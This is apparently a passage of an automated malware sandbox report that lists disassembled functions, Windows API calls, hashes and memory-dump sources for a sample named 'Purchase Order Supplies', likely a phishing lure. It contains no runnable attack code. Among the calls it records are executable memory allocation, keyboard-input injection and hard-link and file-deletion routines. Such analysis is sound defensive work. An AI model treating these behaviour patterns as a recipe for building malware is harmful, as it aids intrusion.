                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1587604923
                          • Opcode ID: 83b27086c417ab85dadfc85100bb97785a4d861a8f04f094ad34bd2cc8bcba1c
                          • Instruction ID: aab9c287768ad0786be0e0e79f074a2275e748f5881b2dd07bc1b9ff2c8c63d6
                          • Opcode Fuzzy Hash: 83b27086c417ab85dadfc85100bb97785a4d861a8f04f094ad34bd2cc8bcba1c
                          • Instruction Fuzzy Hash: 4FD0A930880322BFD7244F29E80868237EAAF40305F04842AEAA5D2770DFB0C8C88B30
                          Function 00CD137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00CD135F,?,00CD1440), ref: 00CD1389
                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CD139B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1071820185
                          • Opcode ID: b7745f67e3a9893f1305a81c3d1bc6c6985a4334ce366e07206fd4d4b665cd2c
                          • Instruction ID: d80c6ea35c96b5fd59c12db31727442c961dbf5996114b3760e140149dd8c383
                          • Opcode Fuzzy Hash: b7745f67e3a9893f1305a81c3d1bc6c6985a4334ce366e07206fd4d4b665cd2c
                          • Instruction Fuzzy Hash: 2AD0A930800322BFDB300F28E84878237E8AF04309F08882AE9A5D2760DBB0C9C48B30
                          Function 00CF3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00CF3AC2,?,00CF3CF7), ref: 00CF3ADA
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CF3AEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: 7934a81bd64c00535d9ceaf8c20b9bb24d6cb6182d56180b96eb50fe57d8e26a
                          • Instruction ID: 5ba531596e7fd1f0dd5a90d228465d1765ef5dddc12ed2eac21fb18d7d8073ca
                          • Opcode Fuzzy Hash: 7934a81bd64c00535d9ceaf8c20b9bb24d6cb6182d56180b96eb50fe57d8e26a
                          • Instruction Fuzzy Hash: 74D05230440323BFD7208FB2AC0A69236E8AB11304B008429E9A5D2250EFB0C9C18A70
                          Function 00C9AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00CE6AA6), ref: 00C9AB2D
                          • _wcscmp.LIBCMT ref: 00C9AB49
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcscmp
                          • String ID:
                          • API String ID: 820872866-0
                          • Opcode ID: 9f238beb3316a29894c34732b9fe273c23fba24473694eb8c674034ae29dded2
                          • Instruction ID: 250878172da4d4e8bf87ebd094b9d43e9d83c4208ae6ac3784ac5e7b2fe4f94e
                          • Opcode Fuzzy Hash: 9f238beb3316a29894c34732b9fe273c23fba24473694eb8c674034ae29dded2
                          • Instruction Fuzzy Hash: F6A1207070020A9BCF14DF65E9886BDBBA1FF48300F64416AEC56C7290EB309971EB96
                          Function 00CF0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00CF0D85
                          • CharLowerBuffW.USER32(?,?), ref: 00CF0DC8
                            • Part of subcall function 00CF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00CF0478
                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CF0FB2
                          • _memmove.LIBCMT ref: 00CF0FC2
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharLower$AllocVirtual_memmove
                          • String ID:
                          • API String ID: 3659485706-0
                          • Opcode ID: 02bdcd27a4d767be4ce9be4cd1b1024ed5a13f04f0167a49e53aba5c89d76366
                          • Instruction ID: ca2d2c0befbabd74a12474698e24c0e0873460d45f74ecc9f19791fa2e9e41c2
                          • Opcode Fuzzy Hash: 02bdcd27a4d767be4ce9be4cd1b1024ed5a13f04f0167a49e53aba5c89d76366
                          • Instruction Fuzzy Hash: 7BB1AF716043058FCB54DF28C88096AB7E4EF89714F24886DF999DB352DB31EE46DB82
                          Function 00CEAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00CEAF56
                          • CoUninitialize.COMBASE ref: 00CEAF61
                            • Part of subcall function 00CD1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00CD10B8
                          • VariantInit.OLEAUT32(?), ref: 00CEAF6C
                          • VariantClear.OLEAUT32(?), ref: 00CEB23F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                          • String ID:
                          • API String ID: 780911581-0
                          • Opcode ID: 50a8657b25bd26d5553525b0726e6f3fff30194279b8862cb54fe4954b76bb21
                          • Instruction ID: a67dde543693ec69231f5f05607620078264efa92ab46f5d6db33a8e9dd92b99
                          • Opcode Fuzzy Hash: 50a8657b25bd26d5553525b0726e6f3fff30194279b8862cb54fe4954b76bb21
                          • Instruction Fuzzy Hash: 82A15B756047429FCB10DF15C895B2AB7E4BF89320F048459FA99AB3A1DB34FD44DB82
                          Function 00C9C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                          Download Yara Rule
                          APIs
                          • _memmove.LIBCMT ref: 00C9C419
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00CD6653,?,?,00000000), ref: 00C9C495
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: FileRead_memmove
                          • String ID:
                          • API String ID: 1325644223-0
                          • Opcode ID: a25e68bf3f7c0eeaf7ac7cba9f5791fd78ad61353f9431549cfb5fe1452c3cbf
                          • Instruction ID: bbd966bdeeae1a22b2743300f16c7194b78ac071a848c348735eb79fd9ca4ebe
                          • Opcode Fuzzy Hash: a25e68bf3f7c0eeaf7ac7cba9f5791fd78ad61353f9431549cfb5fe1452c3cbf
                          • Instruction Fuzzy Hash: 68A1AD70A04609EBDF00CF69C988BB9FBB0FF05300F14C599E8699A295D735E961DBA1
                          Function 00CB42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                          • String ID:
                          • API String ID: 3877424927-0
                          • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                          • Instruction ID: 42d4202d684cf98870843d72977c4871abf41b7469c356ec97e71ce8e20c4a99
                          • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                          • Instruction Fuzzy Hash: A5519670A08305DBDF2C8FA988806EE77F5AF40320F288729F875962E2D7709E559F40
                          Function 00CFC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00CFC354
                          • ScreenToClient.USER32(?,00000002), ref: 00CFC384
                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CFC3EA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: 245e2db09f3fde4406885c9f2ce87b7f346960099a6667bada80a49c074b8d53
                          • Instruction ID: e64786a0dc1292cdae8336d72396fccc1462a9748132182ef4f78216d2325649
                          • Opcode Fuzzy Hash: 245e2db09f3fde4406885c9f2ce87b7f346960099a6667bada80a49c074b8d53
                          • Instruction Fuzzy Hash: 82514E75A0020DEFCF60DF68C9C0ABE7BB6BB45360F208559EA25DB291D7709E41CB91
                          Function 00CCD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CCD258
                          • __itow.LIBCMT ref: 00CCD292
                            • Part of subcall function 00CCD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00CCD549
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00CCD2FB
                          • __itow.LIBCMT ref: 00CCD350
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: 40c0c15373227491fc566210cd9d69bec07a8ddeb894084940f86fbc6753818e
                          • Instruction ID: 24ed7702c5bd71b79b64775873a22b473f4f4de7c279f43433bed0a348f3ad91
                          • Opcode Fuzzy Hash: 40c0c15373227491fc566210cd9d69bec07a8ddeb894084940f86fbc6753818e
                          • Instruction Fuzzy Hash: 9E41A171A00749AFDF15EF54C856FEE7BB9AF48700F000029FA16A3291DB709E45DB62
                          Function 00CDEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CDEF32
                          • GetLastError.KERNEL32(?,00000000), ref: 00CDEF58
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CDEF7D
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CDEFA9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: 798e33264db7149b0fd62ca5e917960b39d3ad4c32049ffcd2170c7aff12cd3e
                          • Instruction ID: 38225a7467f10f32590d12a1909a24302a29bd2daf55fdbf9e639d785524bfbb
                          • Opcode Fuzzy Hash: 798e33264db7149b0fd62ca5e917960b39d3ad4c32049ffcd2170c7aff12cd3e
                          • Instruction Fuzzy Hash: C2415939600611DFCF10EF55C598A49BBE6EF8A320B19C089E956AF362CB34FD44DB91
                          Function 00CFB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CFB3E1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 13b6de90189320c547a42504abd82d02feb3868444650432a1703f6cca53a736
                          • Instruction ID: c089a11d677a7ce27fdf94f5d42d4c2b3f33019f7dde2f1fef6dcbe86a57b60d
                          • Opcode Fuzzy Hash: 13b6de90189320c547a42504abd82d02feb3868444650432a1703f6cca53a736
                          • Instruction Fuzzy Hash: 2931B43464020CFBEFA49E58CD85BB83B65AB05350F248512FB61D62E2CB30DE459B63
                          Function 00CFD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00CFD617
                          • GetWindowRect.USER32(?,?), ref: 00CFD68D
                          • PtInRect.USER32(?,?,00CFEB2C), ref: 00CFD69D
                          • MessageBeep.USER32(00000000), ref: 00CFD70E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 5c52b776283f994e7d000d3ae339704f1f4150476674d74369e3c5fd67a6ca7f
                          • Instruction ID: 3b13451e97fbd1e7c9caf0eb1d12cb0a0e9ee2447f2afbd15066fb13cc55a3d5
                          • Opcode Fuzzy Hash: 5c52b776283f994e7d000d3ae339704f1f4150476674d74369e3c5fd67a6ca7f
                          • Instruction Fuzzy Hash: 33418A34A00218EFCB51DF58D885BA97BF2BB45300F1485AAEA1ADF351D730E941DB52
                          Function 00CD4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,7697C0D0,?,00008000), ref: 00CD44EE
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CD450A
                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00CD456A
                          • SendInput.USER32(00000001,?,0000001C,7697C0D0,?,00008000), ref: 00CD45C8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: a07a890f2fbfefe6d7ecc02ce07a7070b194d0232decd94440af65b98b424e33
                          • Instruction ID: d0d0bedb45ff36e99ef0470e13f515a6f2cec513b0c25973c1dbc785fae857dd
                          • Opcode Fuzzy Hash: a07a890f2fbfefe6d7ecc02ce07a7070b194d0232decd94440af65b98b424e33
                          • Instruction Fuzzy Hash: 0D31E771900298AFEF389B64A8087FE7BA69B49314F04025BF791923C1EB749F45D762
                          Function 00CC4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CC4DE8
                          • __isleadbyte_l.LIBCMT ref: 00CC4E16
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC4E44
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC4E7A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 223ac9fa70c6b77e90af9e213893b6d93cfd3547fc2bfac6703a475971e1632d
                          • Instruction ID: 278fcb8041fcaef392f74aad067cb472750b19f7cc36b582d6b8d3ce7cca63b1
                          • Opcode Fuzzy Hash: 223ac9fa70c6b77e90af9e213893b6d93cfd3547fc2bfac6703a475971e1632d
                          • Instruction Fuzzy Hash: 1D31B031600246AFDF299F75C855FAABBA6FF41320F16C52CE821871A0E730DD51DB90
                          Function 00CF7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00CF7AB6
                            • Part of subcall function 00CD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD69E3
                            • Part of subcall function 00CD69C9: GetCurrentThreadId.KERNEL32 ref: 00CD69EA
                            • Part of subcall function 00CD69C9: AttachThreadInput.USER32(00000000,?,00CD8127), ref: 00CD69F1
                          • GetCaretPos.USER32(?), ref: 00CF7AC7
                          • ClientToScreen.USER32(00000000,?), ref: 00CF7B00
                          • GetForegroundWindow.USER32 ref: 00CF7B06
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: bc4778eb6061164b985fba049067c05b1ebf31f0cac3beaf198bda0eeab94274
                          • Instruction ID: 07e35853e4b54a06382bbbedb2cddf44114f99fee383fb813dc9a23702635558
